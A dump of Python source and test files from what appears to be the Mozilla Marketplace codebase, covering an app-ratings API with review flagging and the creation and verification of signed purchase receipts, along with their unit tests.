self.flag_url = reverse('ratings-flag', kwargs={'pk': self.rating.pk})
def test_has_cors(self):
self.assertCORS(self.client.post(self.flag_url), 'post')
def test_flag(self):
data = json.dumps({'flag': ReviewFlag.SPAM})
res = self.client.post(self.flag_url, data=data)
eq_(res.status_code, 201)
rf = ReviewFlag.objects.get(review=self.rating)
eq_(rf.user, self.user)
eq_(rf.flag, ReviewFlag.SPAM)
eq_(rf.note, '')
def test_flag_note(self):
note = 'do not want'
data = json.dumps({'flag': ReviewFlag.SPAM, 'note': note})
res = self.client.post(self.flag_url, data=data)
eq_(res.status_code, 201)
rf = ReviewFlag.objects.get(review=self.rating)
eq_(rf.user, self.user)
eq_(rf.flag, ReviewFlag.OTHER)
eq_(rf.note, note)
def test_flag_anon(self):
data = json.dumps({'flag': ReviewFlag.SPAM})
res = self.anon.post(self.flag_url, data=data)
eq_(res.status_code, 201)
rf = ReviewFlag.objects.get(review=self.rating)
eq_(rf.user, None)
eq_(rf.flag, ReviewFlag.SPAM)
eq_(rf.note, '')
def test_flag_conflict(self):
data = json.dumps({'flag': ReviewFlag.SPAM})
res = self.client.post(self.flag_url, data=data)
res = self.client.post(self.flag_url, data=data)
eq_(res.status_code, 409)
########NEW FILE########
__FILENAME__ = urls
from rest_framework import routers
from mkt.ratings.views import RatingViewSet
router = routers.DefaultRouter()
router.register(r'rating', RatingViewSet, base_name='ratings')
urlpatterns = router.urls
########NEW FILE########
__FILENAME__ = validators
from django.core.exceptions import ValidationError
def validate_rating(value):
if value > 5 or value < 1 or not isinstance(value, (int, long)):
raise ValidationError('Rating must be an integer between 1 and 5, '
'inclusive')
########NEW FILE########
__FILENAME__ = views
from django.core.paginator import Paginator
from django.http import Http404
import commonware.log
from rest_framework.decorators import action
from rest_framework.exceptions import (MethodNotAllowed, NotAuthenticated,
PermissionDenied)
from rest_framework.mixins import CreateModelMixin
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.viewsets import GenericViewSet, ModelViewSet
import amo
from access.acl import check_addon_ownership
from lib.metrics import record_action
from reviews.models import Review, ReviewFlag
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import (AllowOwner, AllowRelatedAppOwner, AnyOf,
ByHttpMethod, GroupPermission)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.ratings.serializers import RatingFlagSerializer, RatingSerializer
from mkt.regions import get_region
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.api')
class RatingPaginator(Paginator):
# FIXME: This is only right when ?app= filtering is applied, if no
# filtering or if ?user= filtering is done, it's completely wrong.
@property
def count(self):
try:
r = self.object_list[0]
except IndexError:
return 0
return r.addon.total_reviews
class RatingViewSet(CORSMixin, MarketplaceView, ModelViewSet):
# Unfortunately, the model class name for ratings is "Review".
queryset = Review.objects.valid().filter(addon__type=amo.ADDON_WEBAPP)
cors_allowed_methods = ('get', 'post', 'put', 'delete')
permission_classes = [ByHttpMethod({
'options': AllowAny, # Needed for CORS.
'get': AllowAny,
'post': IsAuthenticated,
'put': AnyOf(AllowOwner,
GroupPermission('Apps', 'Edit')),
'delete': AnyOf(AllowOwner,
AllowRelatedAppOwner,
GroupPermission('Users', 'Edit'),
GroupPermission('Apps', 'Edit')),
})]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
serializer_class = RatingSerializer
paginator_class = RatingPaginator
# FIXME: Add throttling ? Original tastypie version didn't have it...
def filter_queryset(self, queryset):
"""
Custom filter method allowing us to filter on app slug/pk and user pk
(or the special user value "mine"). A full FilterSet is overkill here.
"""
filters = {}
app = self.request.GET.get('app')
user = self.request.GET.get('user')
if app:
self.app = self.get_app(app)
filters['addon'] = self.app
if user:
filters['user'] = self.get_user(user)
if filters:
queryset = queryset.filter(**filters)
return queryset
def get_user(self, ident):
pk = ident
if pk == 'mine':
user = amo.get_user()
if not user:
# You must be logged in to use "mine".
raise NotAuthenticated()
pk = user.pk
return pk
def get_app(self, ident):
try:
app = Webapp.objects.by_identifier(ident)
except Webapp.DoesNotExist:
raise Http404
current_region = get_region()
if ((not app.is_public()
or not app.listed_in(region=current_region))
and not check_addon_ownership(self.request, app)):
# App owners and admin can see the app even if it's not public
# or not available in the current region. Regular users or
# anonymous users can't.
raise PermissionDenied('The app requested is not public or not '
'available in region "%s".' % current_region.slug)
return app
def list(self, request, *args, **kwargs):
response = super(RatingViewSet, self).list(request, *args, **kwargs)
app = getattr(self, 'app', None)
if app:
user, info = self.get_extra_data(app, request.amo_user)
response.data['user'] = user
response.data['info'] = info
return response
def destroy(self, request, *args, **kwargs):
obj = self.get_object()
amo.log(amo.LOG.DELETE_REVIEW, obj.addon, obj)
log.debug('[Review:%s] Deleted by %s' %
(obj.pk, self.request.amo_user.id))
return super(RatingViewSet, self).destroy(request, *args, **kwargs)
def post_save(self, obj, created=False):
app = obj.addon
if created:
amo.log(amo.LOG.ADD_REVIEW, app, obj)
log.debug('[Review:%s] Created by user %s ' %
(obj.pk, self.request.amo_user.id))
record_action('new-review', self.request, {'app-id': app.id})
else:
amo.log(amo.LOG.EDIT_REVIEW, app, obj)
log.debug('[Review:%s] Edited by %s' %
(obj.pk, self.request.amo_user.id))
def partial_update(self, *args, **kwargs):
# We don't need/want PATCH for now.
raise MethodNotAllowed('PATCH is not supported for this endpoint.')
def get_extra_data(self, app, amo_user):
extra_user = None
if amo_user and not amo_user.is_anonymous():
if app.is_premium():
# If the app is premium, you need to purchase it to rate it.
can_rate = app.has_purchased(amo_user)
else:
# If the app is free, you can not be one of the authors.
can_rate = not app.has_author(amo_user)
filters = {
'addon': app,
'user': amo_user
}
if app.is_packaged:
filters['version'] = app.current_version
extra_user = {
'can_rate': can_rate,
'has_rated': Review.objects.valid().filter(**filters).exists()
}
extra_info = {
'average': app.average_rating,
'slug': app.app_slug,
'current_version': getattr(app.current_version, 'version', None)
}
return extra_user, extra_info
@action(methods=['POST'], permission_classes=[AllowAny])
def flag(self, request, pk=None):
self.kwargs[self.lookup_field] = pk
self.get_object() # Will check that the Review instance is valid.
request._request.CORS = RatingFlagViewSet.cors_allowed_methods
view = RatingFlagViewSet.as_view({'post': 'create'})
return view(request, *self.args, **{'review': pk})
class RatingFlagViewSet(CORSMixin, CreateModelMixin, GenericViewSet):
queryset = ReviewFlag.objects.all()
cors_allowed_methods = ('post',)
permission_classes = [AllowAny]
authentication_classes = [RestAnonymousAuthentication]
serializer_class = RatingFlagSerializer
def post_save(self, obj, created=False):
review = self.kwargs['review']
Review.objects.filter(id=review).update(editorreview=True)
########NEW FILE########
__FILENAME__ = forms
from urlparse import urlparse
from django import forms
from tower import ugettext_lazy as _lazy
import amo
from addons.models import Addon
from mkt.api.forms import SluggableModelChoiceField
class ReceiptForm(forms.Form):
app = SluggableModelChoiceField(
queryset=Addon.objects.filter(type=amo.ADDON_WEBAPP),
sluggable_to_field_name='app_slug')
class TestInstall(forms.Form):
TYPE_CHOICES = (('none', _lazy('No receipt')),
('ok', _lazy(u'Test receipt')),
('expired', _lazy(u'Expired test receipt')),
('invalid', _lazy(u'Invalid test receipt')),
('refunded', _lazy(u'Refunded test receipt')))
receipt_type = forms.ChoiceField(choices=TYPE_CHOICES)
manifest_url = forms.URLField()
def clean(self):
data = self.cleaned_data
url = data.get('manifest_url')
if url:
parsed = urlparse(url)
data['root'] = '%s://%s' % (parsed.scheme, parsed.netloc)
return data
########NEW FILE########
__FILENAME__ = test_models
import calendar
import time
from django.conf import settings
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_
import amo
import amo.tests
from addons.models import AddonUser
from amo.helpers import absolutify
from amo.tests import addon_factory
from mkt.receipts.utils import create_receipt, get_key
from mkt.webapps.models import Installed, Webapp
from users.models import UserProfile
# We are testing times down to the second. To make sure we don't fail, this
# is the amount of leeway in seconds we are giving the timing tests.
TEST_LEEWAY = 100
class TestReceipt(amo.tests.TestCase):
fixtures = ['base/users.json']
def setUp(self):
self.app = Webapp.objects.create(type=amo.ADDON_WEBAPP)
self.app.update(manifest_url='http://f.c/')
self.user = UserProfile.objects.get(pk=999)
self.other_user = UserProfile.objects.exclude(pk=999)[0]
def create_install(self, user, webapp):
webapp.update(type=amo.ADDON_WEBAPP,
manifest_url='http://somesite.com/')
return Installed.objects.safer_get_or_create(user=user,
addon=webapp)[0]
def test_get_or_create(self):
install = self.create_install(self.user, self.app)
eq_(install, self.create_install(self.user, self.app))
def test_has_installed(self):
assert not self.app.has_installed(self.user)
self.create_install(self.user, self.app)
assert self.app.has_installed(self.user)
def test_receipt(self):
assert (create_receipt(self.app, self.user, 'some-uuid')
.startswith('eyJhbGciOiAiUlM1MTIiLCA'))
def test_receipt_different(self):
assert (create_receipt(self.app, self.user, 'some-uuid')
!= create_receipt(self.app, self.other_user, 'other-uuid'))
def test_addon_premium(self):
for type_ in amo.ADDON_PREMIUMS:
self.app.update(premium_type=type_)
assert create_receipt(self.app, self.user, 'some-uuid')
def test_install_has_uuid(self):
install = self.create_install(self.user, self.app)
assert install.uuid.startswith(str(install.pk))
def test_install_not_premium(self):
for type_ in amo.ADDON_FREES:
self.app.update(premium_type=type_)
Installed.objects.all().delete()
install = self.create_install(self.user,
Webapp.objects.get(pk=self.app.pk))
eq_(install.premium_type, type_)
def test_install_premium(self):
for type_ in amo.ADDON_PREMIUMS:
self.app.update(premium_type=type_)
Installed.objects.all().delete()
install = self.create_install(self.user, self.app)
eq_(install.premium_type, type_)
@mock.patch('jwt.encode')
def test_receipt_data(self, encode):
encode.return_value = 'tmp-to-keep-memoize-happy'
create_receipt(self.app, self.user, 'some-uuid')
receipt = encode.call_args[0][0]
eq_(receipt['product']['url'], self.app.manifest_url[:-1])
eq_(receipt['product']['storedata'], 'id=%s' % int(self.app.pk))
assert receipt['exp'] > (calendar.timegm(time.gmtime()) +
settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS -
TEST_LEEWAY)
eq_(receipt['reissue'], absolutify(reverse('receipt.reissue')))
def test_receipt_not_reviewer(self):
with self.assertRaises(ValueError):
create_receipt(self.app, self.user, 'some-uuid',
flavour='reviewer')
def test_receipt_other(self):
with self.assertRaises(AssertionError):
create_receipt(self.app, self.user, 'some-uuid', flavour='wat')
@mock.patch('jwt.encode')
def for_user(self, app, user, flavour, encode):
encode.return_value = 'tmp-to-keep-memoize-happy'
create_receipt(app, user, 'some-uuid', flavour=flavour)
receipt = encode.call_args[0][0]
eq_(receipt['typ'], flavour + '-receipt')
eq_(receipt['verify'],
absolutify(reverse('receipt.verify', args=[app.guid])))
return receipt
def test_receipt_data_developer(self):
user = UserProfile.objects.get(pk=5497308)
receipt = self.for_user(self.app, user, 'developer')
assert receipt['exp'] > (calendar.timegm(time.gmtime()) +
(60 * 60 * 24) - TEST_LEEWAY)
def test_receipt_data_reviewer(self):
user = UserProfile.objects.get(pk=999)
AddonUser.objects.create(addon=self.app, user=user)
receipt = self.for_user(self.app, user, 'reviewer')
assert receipt['exp'] > (calendar.timegm(time.gmtime()) +
(60 * 60 * 24) - TEST_LEEWAY)
def test_receipt_packaged(self):
app = addon_factory(type=amo.ADDON_WEBAPP, is_packaged=True,
app_domain='app://foo.com')
user = UserProfile.objects.get(pk=5497308)
receipt = self.for_user(app, user, 'developer')
eq_(receipt['product']['url'], 'app://foo.com')
def test_receipt_packaged_no_origin(self):
app = addon_factory(type=amo.ADDON_WEBAPP, is_packaged=True)
user = UserProfile.objects.get(pk=5497308)
receipt = self.for_user(app, user, 'developer')
eq_(receipt['product']['url'], settings.SITE_URL)
@mock.patch.object(settings, 'WEBAPPS_RECEIPT_KEY',
amo.tests.AMOPaths.sample_key() + '.foo')
class TestBrokenReceipt(amo.tests.TestCase):
def test_get_key(self):
self.assertRaises(IOError, get_key)
########NEW FILE########
__FILENAME__ = test_utils_
from nose.tools import eq_
from receipts.receipts import Receipt
from amo.tests import TestCase
from mkt.receipts.tests.test_verify import sample
from mkt.receipts.utils import reissue_receipt
class TestReissue(TestCase):
def test_expired(self):
old = Receipt(sample).receipt_decoded()
new = Receipt(reissue_receipt(sample)).receipt_decoded()
for greater in ['exp', 'iat', 'nbf']:
assert new[greater] > old[greater], (
'{0} for new: {1} should be greater than old: {2}'.format(
greater, new[greater], old[greater]))
for same in ['product', 'detail', 'iss', 'reissue', 'typ', 'user',
'verify']:
eq_(new[same], old[same], (
'{0} for new: {1} should be the same as old: {2}'.format(
greater, new[same], old[same])))
########NEW FILE########
__FILENAME__ = test_verify
# -*- coding: utf-8 -*-
import calendar
import time
from urllib import urlencode
from django.db import connection
from django.conf import settings
import jwt
import M2Crypto
import mock
from browserid.errors import ExpiredSignatureError
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import Addon
from services import utils, verify
from mkt.receipts.utils import create_receipt
from mkt.site.fixtures import fixture
from mkt.prices.models import AddonPurchase
from users.models import UserProfile
from stats.models import Contribution
def get_response(data, status):
response = mock.Mock()
response.read.return_value = data
response.getcode.return_value = status
return response
sample = ('eyJqa3UiOiAiaHR0cHM6Ly9tYXJrZXRwbGFjZS1kZXYtY2RuL'
'mFsbGl6b20ub3JnL3B1YmxpY19rZXlzL3Rlc3Rfcm9vdF9wdWIuandrIiwgInR5cCI6ICJKV'
'1QiLCAiYWxnIjogIlJTMjU2In0.eyJwcm9kdWN0IjogeyJ1cmwiOiAiaHR0cDovL2Rla2tvc'
'3R1ZGlvcy5jb20iLCAic3RvcmVkYXRhIjogImlkPTM2Mzk4MiJ9LCAiaXNzIjogImh0dHBzO'
'i8vbWFya2V0cGxhY2UtZGV2LmFsbGl6b20ub3JnIiwgInZlcmlmeSI6ICJodHRwczovL3JlY'
'2VpcHRjaGVjay1tYXJrZXRwbGFjZS1kZXYuYWxsaXpvbS5vcmcvdmVyaWZ5LzM2Mzk4MiIsI'
'CJkZXRhaWwiOiAiaHR0cHM6Ly9tYXJrZXRwbGFjZS1kZXYuYWxsaXpvbS5vcmcvZW4tVVMvc'
'HVyY2hhc2VzLzM2Mzk4MiIsICJyZWlzc3VlIjogImh0dHBzOi8vbWFya2V0cGxhY2UtZGV2L'
'mFsbGl6b20ub3JnL2VuLVVTL2FwcC9zZWV2YW5zLXVuZGVyd29ybGQtYWR2ZW50dXIvcHVyY'
'2hhc2UvcmVpc3N1ZSIsICJ1c2VyIjogeyJ0eXBlIjogImRpcmVjdGVkLWlkZW50aWZpZXIiL'
'CAidmFsdWUiOiAiMjYzLTI3OGIwYTc3LWE5MGMtNDYyOC1iODQ3LWU3YTU0MzQ1YTMyMCJ9L'
'CAiZXhwIjogMTMzNTk5MDkwOSwgImlhdCI6IDEzMzUzODYxMDksICJ0eXAiOiAicHVyY2hhc'
'2UtcmVjZWlwdCIsICJuYmYiOiAxMzM1Mzg2MTA5fQ.ksPSozpX5ufHSdjrKGEUa9QC1tLh_t'
'a-xIkY18ZRwbmDqV05oCLdhzO6L1Gqzg8bCUg3cl_cBD9cKP23dvqfSwydeZlQL0jbBEUSIs'
'9EDd1_eIDOt_ifjm0D6YrTvfXuokRhD5ojhS6b8_fzAlWiQ_UWnyccaYE2eflR96hGXi-cJZ'
'9u6Fb9DNlgAK4xI4uLzYHxJJuY2N9yotcle0IzQGDBIooBKIns7FWC7J5mCdTJP4nil2rrMb'
'pprvfinNhfK5oYPWTPgc3NQNteBbK7XDoY2ZESXW66sYgG5jDMVnhTO2NXJmyDHuIrhiVWsf'
'xVjY54e0R4NlfjsQmM3wURxg')
# There are two "different" settings files that need to be patched,
# even though they are the same file.
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
amo.tests.AMOPaths.sample_key())
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_URL', 'http://foo.com')
class TestVerify(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999')
def setUp(self):
self.addon = Addon.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=999)
self.user_data = {'user': {'type': 'directed-identifier',
'value': 'some-uuid'},
'product': {'url': 'http://f.com',
'storedata': urlencode({'id': 337141})},
'verify': 'https://foo.com/verifyme/',
'exp': calendar.timegm(time.gmtime()) + 1000,
'typ': 'purchase-receipt'}
def get_decode(self, receipt, check_purchase=True):
# Ensure that the verify code is using the test database cursor.
v = verify.Verify(receipt, RequestFactory().get('/verifyme/').META)
v.cursor = connection.cursor()
name = 'check_full' if check_purchase else 'check_without_purchase'
return getattr(v, name)()
@mock.patch.object(verify, 'decode_receipt')
def get(self, receipt, decode_receipt, check_purchase=True):
decode_receipt.return_value = receipt
return self.get_decode('', check_purchase=check_purchase)
def make_purchase(self):
return AddonPurchase.objects.create(addon=self.addon, user=self.user,
uuid='some-uuid')
def make_contribution(self, type=amo.CONTRIB_PURCHASE):
cont = Contribution.objects.create(addon=self.addon, user=self.user,
type=type)
# This was created by the contribution, but we need to tweak
# the uuid to ensure its correct.
AddonPurchase.objects.get().update(uuid='some-uuid')
return cont
def get_uuid(self):
return self.make_purchase().uuid
@mock.patch.object(utils.settings, 'SIGNING_SERVER_ACTIVE', True)
def test_invalid_receipt(self):
eq_(self.get_decode('blah')['status'], 'invalid')
def test_invalid_signature(self):
eq_(self.get_decode('blah.blah.blah')['status'], 'invalid')
@mock.patch('services.verify.receipt_cef.log')
def test_no_user(self, log):
user_data = self.user_data.copy()
del user_data['user']
res = self.get(user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'NO_DIRECTED_IDENTIFIER')
ok_(log.called)
def test_no_addon(self):
user_data = self.user_data.copy()
del user_data['product']
res = self.get(user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'WRONG_STOREDATA')
def test_user_type_incorrect(self):
user_data = self.user_data.copy()
user_data['user']['type'] = 'nope'
res = self.get(user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'NO_DIRECTED_IDENTIFIER')
def test_type(self):
user_data = self.user_data.copy()
user_data['typ'] = 'anything'
res = self.get(user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'WRONG_TYPE')
def test_user_incorrect(self):
user_data = self.user_data.copy()
user_data['user']['value'] = 'ugh'
res = self.get(user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'NO_PURCHASE')
def test_user_deleted(self):
self.user.delete()
res = self.get(self.user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'NO_PURCHASE')
def test_user_anonymise(self):
#self.user.anonymize()
self.make_purchase()
res = self.get(self.user_data)
eq_(res['status'], 'ok')
@mock.patch('services.verify.sign')
@mock.patch('services.verify.receipt_cef.log')
def test_expired(self, log, sign):
sign.return_value = ''
user_data = self.user_data.copy()
user_data['exp'] = calendar.timegm(time.gmtime()) - 1000
self.make_purchase()
res = self.get(user_data)
eq_(res['status'], 'expired')
ok_(log.called)
@mock.patch('services.verify.sign')
def test_garbage_expired(self, sign):
sign.return_value = ''
user_data = self.user_data.copy()
user_data['exp'] = 'a'
self.make_purchase()
res = self.get(user_data)
eq_(res['status'], 'expired')
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_EXPIRED_SEND', True)
@mock.patch('services.verify.sign')
def test_expired_has_receipt(self, sign):
sign.return_value = ''
user_data = self.user_data.copy()
user_data['exp'] = calendar.timegm(time.gmtime()) - 1000
self.make_purchase()
res = self.get(user_data)
assert 'receipt' in res
@mock.patch.object(utils.settings, 'SIGNING_SERVER_ACTIVE', True)
@mock.patch('services.verify.receipts.certs.ReceiptVerifier.verify')
def test_expired_cert(self, mthd):
mthd.side_effect = ExpiredSignatureError
assert 'typ' in verify.decode_receipt('.~' + sample)
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_EXPIRED_SEND', True)
@mock.patch('services.verify.sign')
def test_new_expiry(self, sign):
user_data = self.user_data.copy()
user_data['exp'] = old = calendar.timegm(time.gmtime()) - 10000
self.make_purchase()
sign.return_value = ''
self.get(user_data)
assert sign.call_args[0][0]['exp'] > old
def test_expired_not_signed(self):
user_data = self.user_data.copy()
user_data['exp'] = calendar.timegm(time.gmtime()) - 10000
self.make_purchase()
res = self.get(user_data)
eq_(res['status'], 'expired')
def test_premium_addon_not_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
res = self.get(self.user_data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'NO_PURCHASE')
def test_premium_dont_check(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
res = self.get(self.user_data, check_purchase=False)
# Because the receipt is the wrong type for skipping purchase.
eq_(res['status'], 'invalid')
eq_(res['reason'], 'WRONG_TYPE')
@mock.patch.object(utils.settings, 'DOMAIN', 'foo.com')
def test_premium_dont_check_properly(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
user_data = self.user_data.copy()
user_data['typ'] = 'developer-receipt'
res = self.get(user_data, check_purchase=False)
eq_(res['status'], 'ok')
def test_premium_addon_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.make_purchase()
res = self.get(self.user_data)
eq_(res['status'], 'ok')
def test_premium_addon_contribution(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
# There's no purchase, but the last entry we have is a sale.
self.make_contribution()
res = self.get(self.user_data)
eq_(res['status'], 'ok')
@mock.patch('services.verify.receipt_cef.log')
def test_premium_addon_refund(self, log):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
purchase = self.make_purchase()
for type in [amo.CONTRIB_REFUND, amo.CONTRIB_CHARGEBACK]:
purchase.update(type=type)
res = self.get(self.user_data)
eq_(res['status'], 'refunded')
eq_(log.call_count, 2)
def test_premium_no_charge(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
purchase = self.make_purchase()
purchase.update(type=amo.CONTRIB_NO_CHARGE)
res = self.get(self.user_data)
eq_(res['status'], 'ok')
def test_other_premiums(self):
self.make_purchase()
for k in (amo.ADDON_PREMIUM, amo.ADDON_PREMIUM_INAPP):
self.addon.update(premium_type=k)
res = self.get(self.user_data)
eq_(res['status'], 'ok')
def test_product_wrong_store_data(self):
self.make_purchase()
data = self.user_data.copy()
data['product'] = {'url': 'http://f.com',
'storedata': urlencode({'id': 123})}
eq_(self.get(data)['status'], 'invalid')
def test_product_ok_store_data(self):
self.make_purchase()
data = self.user_data.copy()
data['product'] = {'url': 'http://f.com',
'storedata': urlencode({'id': 337141})}
eq_(self.get(data)['status'], 'ok')
def test_product_barf_store_data(self):
self.make_purchase()
for storedata in (urlencode({'id': 'NaN'}), 'NaN'):
data = self.user_data.copy()
data['product'] = {'url': 'http://f.com', 'storedata': storedata}
res = self.get(data)
eq_(res['status'], 'invalid')
eq_(res['reason'], 'WRONG_STOREDATA')
def test_crack_receipt(self):
# Check that we can decode our receipt and get a dictionary back.
self.addon.update(type=amo.ADDON_WEBAPP, manifest_url='http://a.com')
purchase = self.make_purchase()
receipt = create_receipt(purchase.addon, purchase.user, purchase.uuid)
result = verify.decode_receipt(receipt)
eq_(result['typ'], u'purchase-receipt')
@mock.patch('services.verify.settings')
@mock.patch('services.verify.receipts.certs.ReceiptVerifier')
def test_crack_receipt_new_called(self, trunion_verify, settings):
# Check that we can decode our receipt and get a dictionary back.
self.addon.update(type=amo.ADDON_WEBAPP, manifest_url='http://a.com')
verify.decode_receipt('.~' + sample)
assert trunion_verify.called
def test_crack_borked_receipt(self):
self.addon.update(type=amo.ADDON_WEBAPP, manifest_url='http://a.com')
purchase = self.make_purchase()
receipt = create_receipt(purchase.addon, purchase.user, purchase.uuid)
self.assertRaises(M2Crypto.RSA.RSAError, verify.decode_receipt,
receipt + 'x')
@mock.patch.object(verify, 'decode_receipt')
def get_headers(self, decode_receipt):
decode_receipt.return_value = ''
return verify.get_headers(verify.Verify('', mock.Mock()))
def test_cross_domain(self):
hdrs = self.get_headers()
assert ('Access-Control-Allow-Origin', '*') in hdrs, (
'No cross domain headers')
assert ('Access-Control-Allow-Methods', 'POST') in hdrs, (
'Allow POST only')
def test_no_cache(self):
hdrs = self.get_headers()
assert ('Cache-Control', 'no-cache') in hdrs, 'No cache header needed'
class TestBase(amo.tests.TestCase):
def create(self, data, request=None):
stuff = {'user': {'type': 'directed-identifier'}}
stuff.update(data)
key = jwt.rsa_load(settings.WEBAPPS_RECEIPT_KEY)
receipt = jwt.encode(stuff, key, u'RS512')
v = verify.Verify(receipt, request)
v.decoded = v.decode()
return v
class TestType(TestBase):
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
amo.tests.AMOPaths.sample_key())
def test_no_type(self):
self.create({'typ': 'test-receipt'}).check_type('test-receipt')
def test_wrong_type(self):
with self.assertRaises(verify.InvalidReceipt):
self.create({}).check_type('test-receipt')
def test_test_type(self):
sample = {'typ': 'test-receipt'}
with self.assertRaises(verify.InvalidReceipt):
self.create(sample).check_type('blargh')
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
amo.tests.AMOPaths.sample_key())
class TestURL(TestBase):
def setUp(self):
self.req = RequestFactory().post('/foo').META
def test_wrong_domain(self):
sample = {'verify': 'https://foo.com'}
with self.assertRaises(verify.InvalidReceipt) as err:
self.create(sample, request=self.req).check_url('f.com')
eq_(str(err.exception), 'WRONG_DOMAIN')
def test_wrong_path(self):
sample = {'verify': 'https://f.com/bar'}
with self.assertRaises(verify.InvalidReceipt) as err:
self.create(sample, request=self.req).check_url('f.com')
eq_(str(err.exception), 'WRONG_PATH')
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
amo.tests.AMOPaths.sample_key())
def test_good(self):
sample = {'verify': 'https://f.com/foo'}
self.create(sample, request=self.req).check_url('f.com')
class TestServices(amo.tests.TestCase):
def test_wrong_settings(self):
with self.settings(SIGNING_SERVER_ACTIVE=''):
eq_(verify.status_check({})[0], 500)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import calendar
import json
import time
import uuid
from django.conf import settings
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import AddonUser
from amo.helpers import absolutify
from devhub.models import AppLog
from mkt.constants import apps
from mkt.receipts.tests.test_models import TEST_LEEWAY
from mkt.receipts.utils import create_test_receipt
from mkt.receipts.views import devhub_verify
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from services.verify import decode_receipt, settings as verify_settings
from users.models import UserProfile
from zadmin.models import DownloadSource
class TestInstall(amo.tests.TestCase):
fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
'group_editor')
def setUp(self):
self.addon = amo.tests.app_factory(manifest_url='http://cbc.ca/man')
self.url = self.addon.get_detail_url('record')
self.user = UserProfile.objects.get(email='[email protected]')
assert self.client.login(username=self.user.email, password='password')
def test_pending_free_for_reviewer(self):
self.addon.update(status=amo.STATUS_PENDING)
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.post(self.url).status_code, 200)
def test_pending_free_for_developer(self):
AddonUser.objects.create(addon=self.addon, user=self.user)
self.addon.update(status=amo.STATUS_PENDING)
eq_(self.client.post(self.url).status_code, 200)
def test_pending_free_for_anonymous(self):
self.addon.update(status=amo.STATUS_PENDING)
eq_(self.client.post(self.url).status_code, 404)
def test_pending_paid_for_reviewer(self):
self.addon.update(status=amo.STATUS_PENDING,
premium_type=amo.ADDON_PREMIUM)
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.post(self.url).status_code, 200)
# Because they aren't using reviewer tools, they'll get a normal
# install record and receipt.
eq_(self.addon.installed.all()[0].install_type,
apps.INSTALL_TYPE_USER)
def test_pending_paid_for_admin(self):
self.addon.update(status=amo.STATUS_PENDING,
premium_type=amo.ADDON_PREMIUM)
self.grant_permission(self.user, '*:*')
eq_(self.client.post(self.url).status_code, 200)
# Check ownership ignores admin users.
eq_(self.addon.installed.all()[0].install_type,
apps.INSTALL_TYPE_USER)
def test_pending_paid_for_developer(self):
AddonUser.objects.create(addon=self.addon, user=self.user)
self.addon.update(status=amo.STATUS_PENDING,
premium_type=amo.ADDON_PREMIUM)
eq_(self.client.post(self.url).status_code, 200)
eq_(self.user.installed_set.all()[0].install_type,
apps.INSTALL_TYPE_DEVELOPER)
def test_pending_paid_for_anonymous(self):
self.addon.update(status=amo.STATUS_PENDING,
premium_type=amo.ADDON_PREMIUM)
eq_(self.client.post(self.url).status_code, 404)
def test_not_record_addon(self):
self.addon.update(type=amo.ADDON_EXTENSION)
res = self.client.post(self.url)
eq_(res.status_code, 404)
eq_(self.user.installed_set.count(), 0)
@mock.patch('mkt.webapps.models.Webapp.has_purchased')
def test_paid(self, has_purchased):
has_purchased.return_value = True
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(self.client.post(self.url).status_code, 200)
def test_own_payments(self):
self.addon.update(premium_type=amo.ADDON_OTHER_INAPP)
eq_(self.client.post(self.url).status_code, 200)
@mock.patch('mkt.webapps.models.Webapp.has_purchased')
def test_not_paid(self, has_purchased):
has_purchased.return_value = False
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(self.client.post(self.url).status_code, 403)
def test_record_logged_out(self):
self.client.logout()
res = self.client.post(self.url)
eq_(res.status_code, 200)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_log_metrics(self, cef):
res = self.client.post(self.url)
eq_(res.status_code, 200)
logs = AppLog.objects.filter(addon=self.addon)
eq_(logs.count(), 1)
eq_(logs[0].activity_log.action, amo.LOG.INSTALL_ADDON.id)
@mock.patch('mkt.receipts.views.record_action')
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_metrics(self, cef, record_action):
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(record_action.call_args[0][0], 'install')
eq_(record_action.call_args[0][2], {'app-domain': u'http://cbc.ca',
'app-id': self.addon.pk,
'anonymous': False})
